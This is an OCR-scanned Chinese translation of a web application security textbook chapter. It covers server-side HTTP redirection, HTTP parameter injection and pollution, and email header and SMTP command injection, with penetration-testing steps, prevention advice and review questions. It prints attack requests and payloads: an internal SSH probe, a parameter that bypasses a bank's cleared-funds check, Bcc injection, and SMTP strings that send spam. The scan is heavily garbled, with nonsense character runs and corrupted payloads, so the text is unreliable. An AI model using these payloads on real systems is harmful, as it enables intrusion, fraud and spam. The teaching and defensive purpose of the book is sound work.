为 防止 上 述 攻击 ， 应 用 程序 应 对 出 现在 用 户 输入 中 的 任何 XML 元 
字符 进行 HTML 编 码 。HTML 编 码 包含 用 对 应 的 HTML 实体 蔡 代 字面 量 
字符 。 这 样 做 可 确保 XML 解释 器 在 进行 处 理 时 ， 把 它们 当做 相关 元 素 
的 数据 值 ， 而 不 是 消息 结构 的 一 部 分 。 一 些 经 常 造成 问题 的 字符 的 
HTML 编 码 如 下 : 





在 上 一 节 中 ， 我 们 介绍 了 一 些 应 用 程序 如 何 将 用 户 提 交 的 数据 合并 
到 后 端 HTTP 请 求 中 ， 以 请 求 用 户 无 法 直接 访问 的 服务 。 更 常见 的 情况 
是 ， 应 用 程序 可 能 会 将 用 户 输 入 先入 任何 类 型 的 后 端 HITP 请 求 ， 包 括 
那些 以 常规 名 / 值 对 传输 参数 的 请 求 。 由 于 应 用 程序 通常 会 有 效 代理 用 
户 提 交 的 URL 或 参数 ， 因 而 这 种 行为 往往 易于 受到 攻击 。 针 对 这 种 功能 
的 攻击 可 以 分 为 以 下 类 别 : 

口服 务 器 端 HITP 重 定向 : 攻击 者 可 以 通过 这 种 方法 指定 任意 资源 
或 URL， 然 后 再 由 后 端 应 用 程序 服务 器 请 求 这 些 资源 或 URL。 

口 HITP 人 参数 注入 HPI : 攻击 者 可 以 通过 这 种 方法 在 应 用 程序 
服务 器 提出 的 后 端 HTTP 请 求 中 注入 任意 参数 。 如 果 攻 击 者 注入 后 端 请 
求 中 已 存在 的 参数 ， 就 可 以 利用 HTTP 参 数 污染 (HPP) 攻击 覆盖 服务 
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如 果 应 用 程序 接受 用 户 可 控制 的 输入 ， 并 将 其 合并 到 使 用 后 端 
HTTP 请 求 检索 的 URL 中 ， 这 种 行为 就 会 导致 服务 器 端 重 定 同 漏 润 。 用 
户 提交 的 输入 中 可 能 包含 被 检索 的 完整 URL， 或 者 应 用 程序 可 能 会 对 该 
URL 进 行 菜 种 处 理 ， 如 添加 标准 的 后 级 。 

后 端 HITP 请 求 可 能 指定 公共 因特网 上 的 某 个 域 ， 或 者 指定 用 户 无 
法 直接 访问 的 内 部 服务 器 。 所 请 求 的 内 容 可 能 对 应 用 程序 的 功能 非常 关 
键 ， 如 支付 网 关 的 接口 ; 或 者 较为 次 要 ， 如 从 第 三 方 提取 的 内 容 。 这 种 
技巧 常用 于 将 几 个 单独 的 内 部 和 外 部 应 用 程序 组 件 结合 到 一 个 前 端 应 用 
程序 中 ， 再 由 该 应 用 程序 代表 这 些 组 件 实施 访问 控制 和 会 话 管理 。 如 果 
攻击 者 能 够 控制 后 端 HTTP 请 求 中 的 IP 地 址 或 主机 名 ， 他 就 可 以 使 应 用 
程序 服务 器 连接 到 任意 资源 ， 有 时 甚至 能 够 检索 后 端 响应 的 内 容 。 

以 下 面 的 前 端 请 求 为 例 ， 其 中 的 loc 参 数 用 于 指定 客户 端 希 望 查 看 
的 CSS 文 件 的 版 本 : 














POST /account/home HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 
Host: wahh-blogs.net 

Content-Length: 65 


view-default&loc=online.wahh-blogs.net/css/wahh.css 


如 果 没 有 在 loc 参 数 中 为 URL 指 定 确认 机 制 ， 攻 击 者 就 可 以 指定 任 
何 主机 名 来 替代 online.wahh-blogs.net。 应 用 程序 将 检索 指定 的 资源 ， 导 
致 攻击 者 将 应 用 程序 用 作 潜 在 的 敏感 后 端 服务 的 代理 服务 器 。 在 下 面 的 
示例 中 ， 攻 击 者 使 应 用 程序 连接 到 后 端 SSH 服 务 : 


POST /account/home HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 
Host: blogs.mdsec.net 

Content-Length: 65 


view=default&loc=192.168.0.1:22 
应 用 程序 的 啊 应 包含 所 请 求 的 SSH 服 务 的 旗 标 : 
HTTP/1.1 200 OK 
Connection: close 


SSH-2.0-OpenSSH_4.2Protocol mismatch. 


攻击 者 可 以 利用 服务 器 端 HITTP 重 定 回 漏洞 ， 将 易 受 攻击 的 应 用 程 
序 作 为 开放 的 HTTP 代理 服务 器 ， 以 实施 各 种 其 他 攻击 。 
口 攻击 者 可 以 将 该 代理 服务 器 用 于 攻击 互联 网 上 的 第 三 方 系统 。 恶 
意 流量 针对 的 是 运行 易 受 攻击 的 应 用 程序 的 服务 器 上 的 目标 。 
口 攻击 者 可 以 将 该 代理 服务 占用 于 连接 到 组 织 内 部 网 络 中 的 任意 主 
机 ， 从 而 访问 无 法 通过 因特网 直接 访问 的 目标 。 
D 攻击 者 可 以 将 该 代理 服务 占用 于 反问 连接 在 应 用 程序 服务 器 本 续 
pee 从 而 突破 防火 墙 的 限制 ， 并 利用 信任 关系 来 避 开 刁 
分 验证 。 

口 最 后 ， 攻 击 者 可 以 通过 使 应 用 程序 在 啊 应 中 包含 受 控 的 内 容 ， 利 
用 代理 功能 实施 跨 站 点 脚本 等 攻击 〈 请 参阅 第 12 章 了 解 详细 信息 ) 。 























渗透 测试 步 又 
(1) 确定 任何 可 能 包含 主机 名 、IP 地 址 或 完整 URL 的 请 求 参 


(2) 对 于 每 个 参数 ， 修 改 参 数值 以 指定 其 他 与 所 请 求 的 资源 
类 似 的 资源 ， 并 观 穴 该 资源 是 否 会 出 现在 服务 器 的 啊 应 中 。 
(3) 演 试 指定 一 个 针对 你 控制 的 因特网 服务 右 的 URL， 并 对 
该 服务 器 进行 监视 ,检查 来 自 所 测试 的 应 用 程序 的 传 入 连接 。 
(4) 如 果 没 有 收 到 任何 传 入 连接 ， 则 监视 应 用 程序 啊 应 所 花 
费 的 时 间 。 如 采 存 在 延迟 ， 则 次 明 应 用 程序 的 后 端 请 求 可 能 由 于 出 
站 连接 上 的 网 络 限制 导致 超时 。 
(5) 如 果 你 成 功利 用 相关 功能 连接 到 任意 URL， 则 可 以 尝试 
实施 以 下 攻击 。 
(a) 确定 是 否 可 以 指定 病 口 号。 例如， 可 以 指定 
http:/mdattacker.net:22。 
(b) WRT em OS, Sei Burp Intruder 等 工具 
XTA RBR SE Tog AFF, ARSE eB — HH TP HE AN Si H 
(请 参阅 第 14 半 了 解 详细 信息 )。 
Cc) 和 莹 试 连接 到 应 用 程序 服务 器 的 回环 地 址 上 的 其 他 服 


Cd) 尝试 将 受 控 的 Web 页 面 加 载 到 应 用 程序 的 啊 应 中 ， 
以 实施 跨 站 点 脚本 攻击 。 
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注解 ”一 些 服 务 器 端 重 定 辐 API， 如 ASP.NET 中 的 
Server.Transfer () 和 Server.Execute () ， 仪 可 重 定向 到 同一 主机 
上 的 相关 URL。 尺 管 如 此 ， 攻 击 者 仍然 可 以 同 这 些 方 法 传递 用 户 提 
~ 以 利用 信任 关系 ， 并 访问 受 平 台 级 身份 验证 保护 的 服务 
器 上 的 资源 。 





A V_ vw) 

笑 试 访问 
http://mdsec.net/updates/97/ 
http://mdsec.net/updates/99/ 


10.4.2 HTTP 参数 注入 


如 果 用 户 提交 的 参数 被 用 作 后 端 HTTP 请 求 中 的 参数 ， 这 时 就 会 导 
致 HITP 参 数 注入 (HPI) 。 以 下 面 的 之 前 易于 受 SOAP 注 入 的 银行 转账 
功能 〈 稍 作 修 改 ) 为 例 : 


POST /bank/48/Default.aspx HTTP/1.0 

Rost: mdsec.net 

Content-Length: 65 
FromAccount-18281008sAmount=-1430&ToAccount-08447656&Submit-Submit 


这 个 前 端 请 求 由 用 户 的 浏览 器 提出 ， 将 导致 应 用 程序 同 银 行 基础 架 
构 中 的 男 一 台 Web 服 务 器 提出 其 他 HTTP 请 求 。 在 以 下 后 端 请 求 中 ， 应 
用 程序 从 前 端 请 求 中 复制 了 一 些 参数 值 : 
POST /doTransfer.asp HTTP/1.0 
Host: mdsec-mgr.int.mdsec.net 
Content-Length: 44 
fromacc=18281008&amount=143 0&toacc=08447656 
这 个 请 求 要 求 后 端 服务 器 检查 是 否 有 清算 资金 可 以 转账 ， 如 果 有 ， 
则 进行 转账 。 但 是 ， 前 端 服 务 器 可 以 通过 提供 以 下 参数 ， 指 定 存在 清算 
资金 ， 从 而 避 开 上 述 检查 : 








clearedfunds=true 


如 琳 攻 击 者 发 现 这 种 行为 ， 他 束 可 以 笃 试 实施 HPI 攻 击 ， 在 后 端 请 
求 中 注入 clearedfunds 参 数 。 要 注入 该 参数 ， 他 将 所 需 参 数 附加 到 现 有 参 


数值 的 后 面 ， 并 将 分 阳 名 称 和 值 的 & 和 = 字符 进行 URL 编 码 ， 如 下 所 
ZN: 


POST /bank/48/Default.aspx HTTP/1.0 
Host: mdsec.net 


Content-Length: 96 


FromAccount=182810084Amount=14308ToAccount=089447656%26clearcafuncst3atru 


ekSubmit=Supmit 


当 应 用 程序 服务 器 处 理 这 个 请 求 时 ， 它 会 以 正常 方式 对 参数 值 进行 
URL 解 码 。 因 此 ， 前 端 应 用 程序 收 到 的 ToAccount 参 数 的 值 为 : 


08447656&clearedfunds=true 


如 果 前 端 应 用 程序 没有 确认 这 个 值 并 将 它 按 原 样 传递 给 后 端 请 求 ， 
应 用 程序 将 提出 以 下 后 问 请 求 ， 使 攻击 者 能 够 成 功 避 开 清 算 资金 检查 : 
POST /doTransfer.asp HTTP/1.0 
Host: mdsec-mgr.int.mdsec.net 





Content-Length: 62 


fromacec=18281008éamount=1430ktoacc=08447656éclearcdfunds=true 


A IF 


http://mdsec.net/bank/48/ 


wea 

SA 

=> TEA ‘GSOAPTEAA TE), EJ mi RKP ENERE BBL 
不 会 导致 任何 错误 。 因 此 ， 要 想 成 功 实施 攻击 ， 需 要 清楚 了 解 应 用 
程序 具体 使 用 了 哪些 后 端 参数 。 在 黑 盒 环 境 下 ， 很 难 确 定 这 些 信 
FA; 但 是 ， 如 果 应 用 程序 使 用 任何 可 以 获取 或 搜索 其 代码 的 第 三 方 
组 件 ， 那 么 就 可 以 轻易 获得 这 些 信息 。 


1. HTTP 参 数 污 染 

HPP 是 一 种 可 用 于 各 种 环境 下 的 攻击 技巧 (请 参阅 第 12 章 和 第 13 间 
了 解 其 他 示例 ) ， 这 种 技巧 常用 在 HPI 攻 击 中 。 

如 果 请 求 中 包含 多 个 同名 请 求 ， 这 时 Web 服 务 器 该 如 何 处 理 ? 对 于 
这 一 问题 ，HTTP 规 范 并 未 提供 任何 指导 。 实 际 上 ， 各 种 Web 服 务 器 的 
处 理 方 式 各 不 相同 ， 以 下 是 一 些 常 见 的 处 理 方式 。 

口 使 用 参数 的 第 一 个 实例 。 

口 使 用 参数 的 最 后 一 个 实例 。 

口 串联 参数 值 ， 可 能 在 参数 之 间 添 加 分 隔 符 。 

口 构建 一 个 包含 所 有 请 求 值 的 数组 。 

在 前 面 的 HPI 示 例 中 ， 攻 击 者 可 以 在 后 端 请 求 中 添加 一 个 新 参数 。 
实际 上 ， 攻 击 者 可 以 对 其 实施 注入 攻击 的 请 求 很 可 能 已 经 包含 一 个 与 攻 
击 者 所 针对 的 参数 同名 的 参数 。 在 这 种 情况 下 ， 攻 击 者 可 以 使 用 HPI 条 
件 注入 男 一 个 同名 和 参数。 随后， 应 用 程序 将 表现 出 何 种 行为 ， 将 取决 于 
后 端 HTTP 服 务 器 如 何 处 理 重复 的 参数 。 这 样 ， 攻 击 者 或 许可 以 用 他 注 
入 的 参数 值 “ 履 盖 ”原始 参数 值 。 

例如 ， 如 果 原 始 的 后 端 请 求 为 : 

















FOST /doTransfer.asp HITP/1.0 
Host: mdsec-mgr.int.mdsec.net 
Content-Length: 62 


fromacc=18281008samount=143 0éclearedfunds=false&toacc=08447655 


Fe AL a vin IRA aE AE oY SAB A PS, MU Be ae AY DAT 
端 请 求 中 的 FromAccount 参 数 实施 攻击 ， 如 下 所 示 : 

POST /bank/52/Default.aspx HTTP/1.0 

Host: mdsec.net 


Content-Length: 96 


FromAcccumnt=18281008%26clearedfundst3dtrue&Amount=1430&ToAccount=9844755 


6&Submit=Submit 


FAS TERR SAN BIE, WRS m WA AAE HEH E R BY a 
AKA, MA BY WO Ai i a IRF IN ToAccount Bt Kj rh - 


AL yn vw.) 

笑 试 访问 
http://mdsec.net/bank/52/ 
http://mdsec.net/bank/57/ 


HPP 攻 击 能 否 成 功 ， 在 很 大 程度 上 取决 于 目标 应 用 程序 服务 器 如 何 
处 理 多 个 同名 参数 ， 以 及 后 端 请 求 中 的 插入 点 古 合 准确 。 如 果 两 种 技术 
需要 处 理 相同 的 HTTP 请 求 ，HPP 攻 击 束 会 造成 严重 的 后 果 。Web 应 用 
程序 防火 墙 或 反 向 代理 可 能 会 处 理 某 个 请 求 ， 并 将 其 传递 给 Web 应 用 程 
Re eet Sage erent oe 
字符 串 。 

欲 了 解 常 见 应 用 程序 服务 器 在 处 理 同名 参数 时 的 不 同行 为 ， 请 参阅 
以 下 论文 : 

www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf 

2. 攻击 URL 转 换 

许多 服务 器 会 在 所 请 求 的 URL 抵 达 时 重 写 这 些 URL， 再 将 它们 映射 
到 应 用 程序 中 的 相关 后 端 功能 。 除 传统 的 URL 重 写 外 ， 服 务 器 在 处 理 
REST 风 格 的 参数 、 定 制导 航 包 装 占 以 及 其 他 URL 转 换 方法 时 都 会 进行 
URL 重 写 。 这 种 处 理 方式 可 能 易 受 HPI 和 HPP 攻 击 。 

为 了 简化 和 便于 导航 ， 一 些 应 用 程序 在 UREL 的 文件 路 径 ， 而 非 查 询 
字符 串 中 插入 参数 值 。 通 第 ， 应 用 程序 会 通过 一 些 简 单 的 规则 转换 
URL， 然 后 将 其 转发 给 真正 的 目标 。Apache 中 的 以 下 mod_rewrite 规 则 用 
于 处 理 可 公共 访问 的 用 户 资料 : 


RewriteCond %{THE_REQUEST} ^[A-Z)]{3,9}\ /pub/user/[*\&)]*\ ETTP/ 




















RewriteRule *pub/user/ ser_mgr.php?mode=view&name=$1 


此 规则 接受 非常 简洁 的 请 求 ， 例 如 ; 
/pub/user/marcus 


并 将 这 些 请 求 转换 为 后 端 请 求 ， 以 便于 用 户 管理 页 面 user_mgr.php 
包含 的 view 功 能 进行 处 理 。 它 将 marcus 参 数 移入 查询 字符 串 并 添加 


mode=view 参 数 : 


/inc/user_mgr.php?mode=view&name=marcus 


在 这 种 情况 下 ， 攻 击 者 就 可 以 利用 HPI 攻 击 在 经 过 重 写 的 URL 中 注 
入 男 一 个 mode 参 数 。 例 如 ， 如 果 攻 击 者 请 求 : 
/pub/user/marcus%26mode=edit 


将 UREL 编 码 的 值 嵌 入 经 过 重 写 的 URL 中 ， 将 得 到 ; 


/inc/user_mgr.pho?mode=viewkname=marcus&mode=edit 


讲 HPP 攻 击 的 我 们 说 到 ， 这 种 攻击 能 人 否 成 功 取决 于 服务 器 如 何 处 理 
人 eee een eee 
得 成 功 。 


渗透 测试 步 又 


(1) 轮流 针对 每 个 请 求 参数 进行 测试 ， 尝 试 使 用 各 种 语法 添 
加 一 个 新 注入 的 参数 。 

OD %26foo%3dbar URL 编 码 的 &foo=bar 

OQ %3bfoo%3dbar URL 编 码 的 ;foo=bar 

J %2526f00%253dbar 双重 URL 编 码 的 &foo=bar 

(2) 确定 任何 修改 后 不 会 改变 应 用 程序 的 行为 的 参数 实例 
ern pete ere error 
BL) 。 

(3) 在 上 一 步 确 定 的 每 个 实例 都 可 以 实施 参数 注入 。 演 试 在 
请 求 的 不 同位 置 注 入 一 个 已 知 的 参数 ， 看 这 样 做 是 否 可 以 复 阁 或 修 
改 现 有 的 某 个 参数 。 例 如 : 

Fromccount=18231008%26Amount%3d4444&Amount=1430eToAcco 

unt=08447656 


(4) MRLE RKA EE RANE, E En NE 
注入 一 个 由 后 端 服务 器 读 取 的 值 来 避 开 任何 前 端 确认 机 制 。 

(5) 用 其 他 参数 名 称 蔡 换 注入 的 已 知 参数 ， 如 第 4 章 介 绍 应 用 
程序 解析 和 内 容 碍 找 时 所 述 。 

C6) 测试 应 用 程序 是 售 人 允许 在 请 求 中 多 次 提交 同一 个 参数 。 
在 其 他 参数 前 后 ， 以 及 请 求 的 不 同位 置 〈 碍 询 字 符 串 、cookie 和 消 
FAZER) 提交 多 余 的 值 。 


























10.5 jt 由 


许多 应 用 程序 拥有 一 项 允许 用 户 通过 应 用 程序 提交 消息 的 功能 。 例 
如 ， 向 支持 人 员 报 告 问 题 或 提供 关于 Web 站 点 的 反馈 。 这 项 功能 一 般 通 
过 邮件 (或 SMTP)〉 服 务 器 执行 。 通 常 ， 用 户 提 交 的 输入 被 插入 到 邮件 
服务 器 处 理 的 SMTP 会 话 中 。 如 果 攻 击 者 能 够 提交 未 被 过 滤 或 净化 的 专 
门 设计 的 输入 ， 就 可 以 在 这 个 会 话 中 注入 任意 SMTP 合 令 。 

多 数 时 候 ， 应 用 程序 允许 用 户 指 定 消息 的 内 容 和 自己 的 电子 邮件 地 
址 (插入 到 生成 电子 邮件 的 From 字 上段 中 ) ， 还 可 以 指定 消息 的 主题 和 其 
他 细节 。 能 够 控制 的 任何 字段 都 易于 受到 SMTP 注 入 。 

SMTP 注 入 漏洞 经 常 被 垃圾 邮件 发 送 者 利用 ， 他 们 扫描 因特网 查找 
易 受 攻击 的 邮件 表单 ， 并 使 用 它们 生成 大 量 垃 圾 电子 邮件 。 


10.5.1 $È% 由 未 > 
以 图 10-6 所 示 的 表单 为 例 ， 它 允许 用 户 发 送 关 于 应 用 程序 的 反馈 。 


marcus@wahh-mail.com 














Submit comments 


图 10-6 一 个 典型 的 站 点 反馈 表单 


在 该 表单 中 ， 用 户 可 指定 发 件 人 From) 地 址 和 邮件 的 内 容 。 应 用 
程序 将 这 个 输入 传送 给 PHP mail O 命令 ， 由 它 建立 邮件 并 与 它 配置 的 
邮件 服务 器 进行 必要 的 SMTP 会 话 。 生 成 的 邮件 如 下 : 


To: admin@wahh-app.com 
From: marcus@wahh-mail.com 
Subject: Site problem 


Confirm Order page doesn't load 


PHP mail () 命令 使 用 additional headers 参 数 为 消息 设 定 发 件 人 地 
址 。 这 个 参数 还 可 用 于 指定 其 他 标 头 ， 包 括 Cc 和 Bcc， 并 用 换行 符 分 隔 
每 个 被 请 求 的 标 头 。 因 此 ， 攻 击 者 可 以 通过 在 From 字 段 中 注入 这 其 中 某 
个 标 头 ， 将 邮件 发 送 给 任意 收 件 人 ， 如 图 10-7 所 示 。 


Your email address” 





[marcus@wahh-mail com%0aBcc:all@wahh-othercompany.com 


Subject Site problem 


Comment" 


Confirm Order page doesn't load 





Submit comments | Reset | 
图 10-7 电子 邮件 标 头 注入 攻击 


这 会 导致 mail O 命令 生成 以 下 邮件 : 


To: admin@wahh-app.com 

From: marcus@wahh-mail.com 
Bcc: all@wahh-othercompany.com 
Subject: Site problem 


Confirm Order page doesn't load 


10.5.2 SMTP 命 今 注 入 


FES MTOR, MHIE AT REST SMTP 2st, KEH pE 
KAREA — PAS I AP EMIX “ES o TAI, BAM ey DA Be 
在 这 个 会 话 中 注入 任意 SMTP 命 令 ， 完 全 控制 由 应 用 程序 生成 的 消息 。 

例如 ， 以 一 个 使 用 以 下 请 求 提交 站 点 有 反馈 的 应 用 程序 为 例 : 


POST feedback.php HTTP/1.1 

Host: wahh-apr.com 

Content-Length: 56 

From=daf@wahhn-mail.com&Subject=Site+feedback&Message=f[o00 

应 用 程序 会 使 用 以 下 命令 开始 一 个 SMTP 会 话 : 

MAIL FROM: daf@wahh-mail .com 
RCPT TO: feedback@wahh-app.com 
DATA 


From: daf@wahh-mail.com 


To: feedback@wahh-app.com 
Subject: Site feedback 
foo 


—_ 
ES 

=> 注解 ”SMTP 客户 端 发 出 DATA 命 令 后 ， 应 用 程序 送出 电子 
segs Wi Geet erin mules 然后 发 送 一 个 点 字符 
CO 。 这 告诉 服务 器 消息 已 发 送 完毕 ， 客 户 端 可 以 发 出 其 他 SMTP 
命令 ， 发 送 其 他 消息 。 


这 时 ， 攻 击 者 可 以 在 任何 受 控 的 电子 邮件 字段 中 注入 任意 SMTP 命 
。 例 如 ， 他 可 以 党 试 注 入 Subject 字 段 ， 如 下 所 示 : 


a> 


POST feedback.pho ETTP/1.1 

Host: wahh-app.com 

Content-Length: 266 
From7daf@wahh-mail.com&Subject*Site+feedback30d%0afoot0ds0at2e%0d 
¢0aMAIL+FPROM: +mail@wanh-viagra.comt0dt0aRCPT+TO:+johnGwahh-mail 

. come 0Gs0aDATAtO0ds0aFrom: +mai 1 @wahh-viagra.comt0dt0aTo: 4 john@wahh-mai | 
. comet 0Gs0asubject :+Cheap-VLAGRAS0d$0aBlaht 0c Jat2et0dt0aemMessage=foo 


如 末 应 用 程序 易 受 攻击 ， 那 么 会 建立 以 下 SMTP 会 话 ， 它 生成 两 个 
不 同 的 电子 邮件 消息 ， 其 中 第 二 个 完全 由 攻击 者 控制 : 


MAIL FROM: daf@wahh-mail.com 
RCPT TO: feedback@wahh-app.com 
DATA 

From: daf@wahh-mail.com 

To: feedback@wahh-app.com 
Subject: Site+feedback 

foo 

MAIL FROM: mail@wahh-viagra.com 
RCPT TO: john@wahh-mail.com 
DATA 

From: mail@wahh-viagra.com 

To: john@wahh-mail.com 
Subject: Cheap V1AGR4 

Blah 


foo 





为 了 有 效 探 查 应 用 程序 的 邮件 功能 ， 需 要 测试 每 一 个 提交 给 与 电子 
邮件 有 关 的 功能 的 参数 ， 甚 至 那些 最 ITA 56 A RELI LSE SL. 

渗透 测试 员 还 应 该 测试 每 一 种 攻击 ， 并 在 每 个 测试 中 使 用 Windows 
和 UNIX 形 式 的 换行 符 。 


渗透 测试 步 又 


(1) 应 当 轮 流 提 交 下 面 的 每 个 测试 字符 串 作为 每 一 个 参数 ， 
在 相关 位 置 插入 电子 邮件 地 址 。 


<youremail>%0aCc:<youremail> 
<youremail>%0d%0aCc:<youremail> 
<youremail>%0aBce:<youremail> 
<youremail>%0d%0aBcc: <youremail> 


& 0aADATAS 0a foot 0at2e8 OAMATL+FPROM: +<youremail>%0aRcC PT+TO:+<y 
ouremail>%0aDATA%0aFrom: +<youremail>%0aTo:+<youremail>%0as 
ubject :+testt0afoot0at2zet0a 


%0d% 0aDATAS 04% 0a f00% 04% 0a% 26% 04% OAMAIL+FROM: +<youremail>%0 
4% 0aRC PT+TO;: +<youremail>%0d% 0aDATA? 04% 0aFrom: +<youremail>% 
04% 0aTo:+<youremail>%0d%0asubject :+test%0dt0 
afoot0d%0a%2e%0d%0a 


(2) FS DA REP E Ee UR EE R E 
ey) R yin recy et 
I 用 漏洞 。 

(3) 应 用 程序 的 啊 应 可 能 并 不 会 以 任何 形式 表示 一 个 漏洞 存 
人 

子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HTML 表 单 。 它 们 可 能 提供 与 
服务 强 端 使 用 的 软件 有 关 的 线索 。 其 中 可 能 包含 一 个 用 于 指定 电子 
邮件 收 件 人 地 址 的 隐藏 或 共用 字段 ， 可 以 直接 对 其 进行 修改 。 





YY ”提示 ” 同 应 用 程序 支持 人 员 友 送 电 子 邮件 的 功能 常常 被 视 
为 外 围 功能 ， 应 用 程序 可 能 并 不 对 其 采用 与 主要 功能 相同 的 安全 标 
准 ， 或 者 进行 严格 的 测试 。 而 且 ， 因 为 它们 需要 连接 不 常用 的 后 站 
组 件 ， 应 用 程序 往往 通过 直接 调用 相关 操作 系统 命令 来 执行 它们 。 
因此 ， 队 探查 SMTP 注 入 漏洞 外 ， 还 应 极其 仔细 地 检查 所 有 与 电子 
邮件 有 关 的 功能 ， 碍 找 OS 命 令 注 入 漏洞 。 


10.5.4 防止 SMTP 注 入 


如 果 对 提交 给 电子 邮件 功能 或 SMTP 会 话 使 用 的 任何 用 户 提交 的 数 
据 进 行 严 格 的 确认 检查 ， 就 可 以 防止 SMTP 注 入 漏洞 。 因 此 ， 应 根据 其 
用 途 对 每 项 数据 进行 尽 可 能 严格 的 确认 。 
应 根据 一 个 适当 的 正则 表达 式 检查 电子 邮件 地 址 (当然 应 拒绝 所 

行 符 ) 。 

口 消 轧 主 题 不 得 包含 任何 换行 符 ， 并 应 实施 适当 的 长 度 限制 。 

口 如 果 消 恩 内 容 被 一 个 SMTP 会 话 直 接 使 用 ， 那 么 应 禁止 使 用 仪 包 
含 一 个 点 字符 的 消息 行 。 


10.6 ”小结 


我 们 已 经 分 析 了 一 系列 针对 后 端 应 用 程序 组 件 的 攻击 ， 了 解 到 确定 
并 利用 每 一 种 漏洞 所 需 采 取 的 实际 步骤 。 许 多 现实 世界 的 漏洞 ， 使 用 应 
用 程序 后 立即 就 会 发 现 ， 例 如， 通过 在 搜索 框 中 输入 异常 语法 进行 搜 
索 。 另 外 ， 这 些 漏洞 可 能 隐藏 得 非常 深 ， 极 少 给 应 用 程序 造成 可 以 检测 
的 行为 差异 ， 也 无 法 通过 提交 并 操纵 专门 设计 的 输入 的 多 阶段 过 程 发 
现 。 

要 确定 应 用 程序 中 存在 的 后 端 注 入 缺陷 ， 需 要 进行 耐心 仔细 的 检 
汕 。 实 际 上 ， 几 乎 每 一 种 注入 缺陷 都 会 在 处 理 用 户 提 交 的 数据 过 程 中 表 
露出 来 ， 这 些 数据 包括 碍 询 字符 串 参 数 的 名 称 与 值 、POST 数 据 、cookie 
以 及 其 他 HTTP 消息 凑 。 许 多 时 候 ， 只 有 在 全 面 探 租 了 相关 参数 ， 明 确 
了 解 应 用 程序 对 输入 执行 了 何 种 类 型 的 处 理 ， 并 排除 测试 过 程 中 的 障碍 
后 ， 漏 洞 才 会 显露 出 来 。 

面 对 后 端 应 用 程序 组 件 的 攻击 造成 了 大 量 潜在 的 受 攻击 面 ， 渗 透 测 
试 员 可 能 觉得 对 应 用 程序 实施 任何 严重 的 攻击 都 必须 付出 巨大 的 努力 。 
然而 ， 从 很 大 程度 上 讲 ， 实 施 有 效 攻击 需要 从 直觉 上 了 解 漏洞 的 位 置 ， 
以 及 如 何 对 其 加 以 利用 。 获 得 这 种 直觉 的 唯一 途径 是 进行 实践 ， 针 对 在 
ee 
Kit 





10.7 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netywahh。 

(1) 某 网 络 设备 提供 用 于 执行 设备 配置 的 Web 界 面 。 为 什么 这 种 
功能 通常 易于 受到 操作 系统 命令 注入 攻击 ? 

(2) 在 测试 以 下 URLH 时 : 


http://wahh-app.com/home/statsmgr.aspx?country=US 
将 country 参 数 的 值 更 改 为 foo 导 致 以 下 错误 消息 : 
Could not open file: D:\app\default\home\logs\foo.log (invalid file). 


可 以 采取 哪些 步骤 对 应 用 程序 实施 攻击 ? 

(3) 在 对 一 个 在 POST 请 求 中 以 XML 格式 传送 数据 的 应 用 程序 进行 
测试 时 ， 可 以 利用 哪 种 漏洞 从 服务 器 的 文件 系统 中 读 取 任意 文件 ? 要 成 
功 实 施 攻 击 ， 必 须 满足 哪些 先决 条 件 ? 

(4) 同 ASP.NET 平 台 上 运行 的 应 用 程序 提出 以 下 请 求 : 


POST /home.aspx?p=urlparaml&p=urlparam2 HTTP/1.1 
Host: wahh-app.com 

Cookie: p=cookieparam 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 15 


p-bodyparam 
应 用 程序 执行 以 下 代码 : 
String param = Request.Params["p"]; 


请 问 param 变 量 的 值 是 什么 ? 

(5) HPP 是 HPI 的 前 提 ， 还 是 HPI 是 HPP 的 前 提 ? 

(6) 某 应 用 程序 包含 一 项 功能 ， 该 功能 向 外 部 域 提 出 请 求 ， 并 返 
回 这 些 请 求 的 响应 。 为 防止 服务 器 端 重 定向 攻击 检索 应 用 程序 自己 的 
Web 服 务 器 上 的 受 保护 资源 ， 应 用 程序 阻止 了 以 localhost 或 127.0.0.1 为 
目标 的 请 求 。 如 何 突 破 这 种 防御 ， 以 访问 服务 器 上 的 资源 ? 

(7) 某 应 用 程序 使 用 一 项 用 于 提交 用 户 反馈 的 功能 。 该 功能 允许 
用 户 提 交 他 们 的 电子 邮件 地 址 、 邮 件 主 题 及 详细 的 反馈 。 然 后 ， 应 用 程 


Fp DAFA ELERNA ETE SC, MHA BY ET A HHE e 
feedback@wahh-app.com 发 送 一 封 电子 邮件 。 以 下 哪 一 种 方法 能 够 有 效 
防御 邮件 注入 攻击 ? 

Ca) 在 邮件 服务 器 上 禁用 邮件 中 继 。 

(b) 使 用 feedback@wahh-app.com 便 编码 RCPT TO 字段 。 

Co) 确保 用 户 提 交 的 输入 不 包含 任何 换行 符 或 其 他 SMTP 


一 DS Ae 


TUF AT o 


=~ 


Į V AP Ae tE 


FUT Awon RAAF ASABE BAHAR. MUIBALLR, Ha 
程 语言 编写 代码 就 是 把 一 个 复杂 的 进程 分 解 成 一 些 非常 简单 而 又 相互 独 
立 的 逻辑 步骤 。 将 一 项 对 人 类 有 用 的 功能 转换 成 一 系列 计算 机 能 够 执行 
的 细微 操作 ， 需 要 掌握 大 量 的 技巧 并 进行 周密 的 安排 。 顺 利 、 安 全 地 完 
成 以 上 任务 就 更 显 困 难 。 如 果 由 背景 各 不 相同 的 开发 者 与 程序 员 并 行 开 
发 同一 个 应 用 程序 ， 那 么 在 这 个 过 程 中 可 能 会 发 生 很 多 错误 。 

在 所 有 即使 是 非常 简单 的 web 应 用 程序 中 ， 每 个 阶段 都 会 执行 数目 
庞大 的 逻辑 操作 。 这 些 逻 辑 代 表 着 一 个 复杂 的 受 攻击 面 ， 它 虽然 从 未 消 
失 ， 但 往往 被 人 们 忽略 。 许 多 代码 审查 与 渗透 测试 主要 针对 常见 的 “ 头 
条 ” 式 漏 洞 ， 如 SQL 注入 和 路 站 点 脚本 ， 因 为 它们 具有 容易 辨别 的 签 
名 ， 人 们 对 它们 的 利用 方法 也 进行 了 广泛 的 研究 。 相 反 ， 应 用 程序 的 逻 
辑 缺 陷 更 难以 辨别 : 每 一 种 缺陷 似乎 都 是 唯一 的 ， 通 常 自动 漏洞 扫描 器 

常 感 兴趣 。 

